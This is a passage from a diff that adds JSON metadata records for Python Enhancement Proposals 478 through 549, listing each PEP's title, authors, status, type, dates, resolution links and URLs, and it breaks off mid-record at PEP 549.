"discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "22-Sep-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0478/" + }, + "479": { + "number": 479, + "title": "Change StopIteration handling inside generators", + "authors": "Chris Angelico, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2014", + "python_version": "3.5", + "post_history": "15-Nov-2014, 19-Nov-2014, 05-Dec-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0479/" + }, + "480": { + "number": 480, + "title": "Surviving a Compromise of PyPI: End-to-end signing of packages", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore", + "discussions_to": "https://discuss.python.org/t/5666", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Oct-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": "458", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0480/" + }, + "481": { + "number": 481, + "title": "Migrate CPython to Git, Github, and Phabricator", + "authors": "Donald Stufft", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "29-Nov-2014", + "python_version": null, + "post_history": "29-Nov-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0481/" + }, + "482": { + "number": 482, + "title": "Literature Overview for Type Hints", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "08-Jan-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0482/" + }, + "483": { + "number": 483, + "title": "The Theory of Type Hints", + "authors": "Guido van Rossum, Ivan Levkivskyi", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "19-Dec-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0483/" + }, + "484": { + "number": 484, + "title": "Type Hints", + "authors": "Guido van Rossum, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-Sep-2014", + "python_version": "3.5", + "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0484/" + }, + "485": { + "number": 485, + "title": "A Function for testing approximate equality", + "authors": "Christopher Barker", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2015", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138598.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0485/" + }, + "486": { + "number": 486, + "title": "Make the Python Launcher aware of virtual environments", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Feb-2015", + "python_version": "3.5", + "post_history": "12-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138579.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0486/" + }, + "487": { + "number": 487, + "title": "Simpler customisation of class creation", + "authors": "Martin Teichmann", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Feb-2015", + "python_version": "3.6", + "post_history": "27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145629.html", + "requires": null, + "replaces": "422", + "superseded_by": null, + "url": "https://peps.python.org/pep-0487/" + }, + "488": { + "number": 488, + "title": "Elimination of PYO files", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2015", + "python_version": "3.5", + "post_history": "06-Mar-2015, 13-Mar-2015, 20-Mar-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0488/" + }, + "489": { + "number": 489, + "title": "Multi-phase extension module initialization", + "authors": "Petr Viktorin, Stefan Behnel, Alyssa Coghlan", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2013", + "python_version": "3.5", + "post_history": "23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140108.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0489/" + }, + "490": { + "number": 490, + "title": "Chain exceptions at C level", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Mar-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0490/" + }, + "491": { + "number": 491, + "title": "The Wheel Binary Package Format 1.9", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Apr-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0491/" + }, + "492": { + "number": 492, + "title": "Coroutines with async and await syntax", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Apr-2015", + "python_version": "3.5", + "post_history": "17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0492/" + }, + "493": { + "number": 493, + "title": "HTTPS verification migration tools for Python 2.7", + "authors": "Alyssa Coghlan, Robert Kuska, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2015", + "python_version": "2.7.12", + "post_history": "06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-March/143450.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0493/" + }, + "494": { + "number": 494, + "title": "Python 3.6 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-May-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0494/" + }, + "495": { + "number": 495, + "title": "Local Time Disambiguation", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-September/000900.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0495/" + }, + "496": { + "number": 496, + "title": "Environment Markers", + "authors": "James Polley", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "packaging", + "created": "03-Jul-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0496/" + }, + "497": { + "number": 497, + "title": "A standard mechanism for backward compatibility", + "authors": "Ed Schofield", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "04-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0497/" + }, + "498": { + "number": 498, + "title": "Literal String Interpolation", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2015", + "python_version": "3.6", + "post_history": "07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-September/141526.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0498/" + }, + "499": { + "number": 499, + "title": "``python -m foo`` should also bind ``'foo'`` in ``sys.modules``", + "authors": "Cameron Simpson, Chris Angelico, Joseph Jevnik", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "07-Aug-2015", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0499/" + }, + "500": { + "number": 500, + "title": "A protocol for delegating datetime methods to their tzinfo implementations", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-August/000354.html", + "requires": "495", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0500/" + }, + "501": { + "number": 501, + "title": "General purpose template literal strings", + "authors": "Alyssa Coghlan, Nick Humrich", + "discussions_to": "https://discuss.python.org/t/pep-501-reopen-general-purpose-string-template-literals/24625", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": "3.12", + "post_history": "`08-Aug-2015 `__, `05-Sep-2015 `__, `09-Mar-2023 `__,", + "resolution": null, + "requires": "701", + "replaces": null, + "superseded_by": "750", + "url": "https://peps.python.org/pep-0501/" + }, + "502": { + "number": 502, + "title": "String Interpolation - Extended Discussion", + "authors": "Mike G. Miller", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "10-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0502/" + }, + "503": { + "number": 503, + "title": "Simple Repository API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Sep-2015", + "python_version": null, + "post_history": "04-Sep-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026899.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0503/" + }, + "504": { + "number": 504, + "title": "Using the System RNG by default", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "15-Sep-2015", + "python_version": "3.6", + "post_history": "15-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0504/" + }, + "505": { + "number": 505, + "title": "None-aware operators", + "authors": "Mark E. Haase, Steve Dower", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Sep-2015", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0505/" + }, + "506": { + "number": 506, + "title": "Adding A Secrets Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0506/" + }, + "507": { + "number": 507, + "title": "Migrate CPython to Git and GitLab", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "30-Sep-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/core-workflow/2016-January/000345.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0507/" + }, + "508": { + "number": 508, + "title": "Dependency specification for Python Software Packages", + "authors": "Robert Collins", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2015", + "python_version": null, + "post_history": "05-Nov-2015, 16-Nov-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-November/027868.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0508/" + }, + "509": { + "number": 509, + "title": "Add a private version to dict", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": "`08-Jan-2016 `__, `11-Jan-2016 `__, `14-Apr-2016 `__, `19-Apr-2016 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/QFVJV6YQOUSWIYY4FBORY647YCBSCIMQ/", + "requires": null, + "replaces": null, + "superseded_by": "699", + "url": "https://peps.python.org/pep-0509/" + }, + "510": { + "number": 510, + "title": "Specialize functions with guards", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0510/" + }, + "511": { + "number": 511, + "title": "API for code transformers", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0511/" + }, + "512": { + "number": 512, + "title": "Migrating from hg.python.org to GitHub", + "authors": "Brett Cannon", + "discussions_to": "core-workflow@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "17-Jan-2015", + "python_version": null, + "post_history": "17-Jan-2016, 19-Jan-2016, 23-Jan-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0512/" + }, + "513": { + "number": 513, + "title": "A Platform Tag for Portable Linux Built Distributions", + "authors": "Robert T. McGibbon, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "19-Jan-2016", + "python_version": null, + "post_history": "19-Jan-2016, 25-Jan-2016, 29-Jan-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-January/028211.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0513/" + }, + "514": { + "number": 514, + "title": "Python registration in the Windows registry", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Feb-2016", + "python_version": null, + "post_history": "02-Feb-2016, 01-Mar-2016, 18-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145697.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0514/" + }, + "515": { + "number": 515, + "title": "Underscores in Numeric Literals", + "authors": "Georg Brandl, Serhiy Storchaka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2016", + "python_version": "3.6", + "post_history": "10-Feb-2016, 11-Feb-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0515/" + }, + "516": { + "number": 516, + "title": "Build system abstraction for pip/conda etc", + "authors": "Robert Collins, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "26-Oct-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-May/030517.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0516/" + }, + "517": { + "number": 517, + "title": "A build-system independent format for source trees", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Sep-2015", + "python_version": null, + "post_history": "01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-September/031548.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0517/" + }, + "518": { + "number": 518, + "title": "Specifying Minimum Build System Requirements for Python Projects", + "authors": "Brett Cannon, Nathaniel J. Smith, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2016", + "python_version": null, + "post_history": "10-May-2016, 11-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-May/028969.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0518/" + }, + "519": { + "number": 519, + "title": "Adding a file system path protocol", + "authors": "Brett Cannon, Koos Zevenhoven", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-May-2016", + "python_version": "3.6", + "post_history": "11-May-2016, 12-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-May/144646.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0519/" + }, + "520": { + "number": 520, + "title": "Preserving Class Attribute Definition Order", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Jun-2016", + "python_version": "3.6", + "post_history": "07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-June/145442.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0520/" + }, + "521": { + "number": 521, + "title": "Managing global context via 'with' blocks in generators and coroutines", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2015", + "python_version": "3.6", + "post_history": "29-Apr-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0521/" + }, + "522": { + "number": 522, + "title": "Allow BlockingIOError in security sensitive APIs", + "authors": "Alyssa Coghlan, Nathaniel J. Smith", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/security-sig/2016-August/000101.html", + "requires": "506", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0522/" + }, + "523": { + "number": 523, + "title": "Adding a frame evaluation API to CPython", + "authors": "Brett Cannon, Dino Viehland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-May-2016", + "python_version": "3.6", + "post_history": "16-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-August/145937.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0523/" + }, + "524": { + "number": 524, + "title": "Make os.urandom() blocking on Linux", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0524/" + }, + "525": { + "number": 525, + "title": "Asynchronous Generators", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2016", + "python_version": "3.6", + "post_history": "02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0525/" + }, + "526": { + "number": 526, + "title": "Syntax for Variable Annotations", + "authors": "Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "09-Aug-2016", + "python_version": "3.6", + "post_history": "30-Aug-2016, 02-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146282.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0526/" + }, + "527": { + "number": 527, + "title": "Removing Un(der)used file types/extensions on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "23-Aug-2016", + "python_version": null, + "post_history": "23-Aug-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-September/029624.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0527/" + }, + "528": { + "number": 528, + "title": "Change Windows console encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146278.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0528/" + }, + "529": { + "number": 529, + "title": "Change Windows filesystem encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146277.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0529/" + }, + "530": { + "number": 530, + "title": "Asynchronous Comprehensions", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2016", + "python_version": "3.6", + "post_history": "03-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0530/" + }, + "531": { + "number": 531, + "title": "Existence checking operators", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2016", + "python_version": "3.7", + "post_history": "28-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0531/" + }, + "532": { + "number": 532, + "title": "A circuit breaking protocol and binary operators", + "authors": "Alyssa Coghlan, Mark E. Haase", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Oct-2016", + "python_version": "3.8", + "post_history": "05-Nov-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0532/" + }, + "533": { + "number": 533, + "title": "Deterministic cleanup for iterators", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2016", + "python_version": null, + "post_history": "18-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0533/" + }, + "534": { + "number": 534, + "title": "Improved Errors for Missing Standard Library Modules", + "authors": "Tom\u00e1\u0161 Orsava, Petr Viktorin, Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2016", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0534/" + }, + "535": { + "number": 535, + "title": "Rich comparison chaining", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2016", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": "532", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0535/" + }, + "536": { + "number": 536, + "title": "Final Grammar for Literal String Interpolation", + "authors": "Philipp Angerer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2016", + "python_version": "3.7", + "post_history": "`18-Aug-2016 `__, `23-Dec-2016 `__, `15-Mar-2019 `__", + "resolution": "https://discuss.python.org/t/pep-536-should-be-marked-as-rejected/35226/4", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0536/" + }, + "537": { + "number": 537, + "title": "Python 3.7 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Dec-2016", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0537/" + }, + "538": { + "number": 538, + "title": "Coercing the legacy C locale to a UTF-8 based locale", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2016", + "python_version": "3.7", + "post_history": "03-Jan-2017, 07-Jan-2017, 05-Mar-2017, 09-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/148035.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0538/" + }, + "539": { + "number": 539, + "title": "A New C-API for Thread-Local Storage in CPython", + "authors": "Erik M. Bray, Masayuki Yamamoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2016", + "python_version": "3.7", + "post_history": "16-Dec-2016, 31-Aug-2017, 08-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149358.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0539/" + }, + "540": { + "number": 540, + "title": "Add a new UTF-8 Mode", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jan-2016", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151173.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0540/" + }, + "541": { + "number": 541, + "title": "Package Index Name Retention", + "authors": "\u0141ukasz Langa", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-Jan-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-March/032089.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0541/" + }, + "542": { + "number": 542, + "title": "Dot Notation Assignment In Function Header", + "authors": "Markus Meskanen", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156695.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0542/" + }, + "543": { + "number": 543, + "title": "A Unified TLS API for Python", + "authors": "Cory Benfield, Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2016", + "python_version": "3.7", + "post_history": "11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "748", + "url": "https://peps.python.org/pep-0543/" + }, + "544": { + "number": 544, + "title": "Protocols: Structural subtyping (static duck typing)", + "authors": "Ivan Levkivskyi, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Mar-2017", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0544/" + }, + "545": { + "number": 545, + "title": "Python Documentation Translations", + "authors": "Julien Palard, Inada Naoki, Victor Stinner", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "04-Mar-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/147957.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0545/" + }, + "546": { + "number": 546, + "title": "Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7", + "authors": "Victor Stinner, Cory Benfield", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-May-2017", + "python_version": "2.7", + "post_history": "23-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-June/148301.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0546/" + }, + "547": { + "number": 547, + "title": "Running extension modules using the -m option", + "authors": "Marcel Plch, Petr Viktorin", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-May-2017", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0547/" + }, + "548": { + "number": 548, + "title": "More Flexible Loop Control", + "authors": "R David Murray", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0548/" + }, + "549": { + "number": 549, + "title": "Instance Descriptors", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": 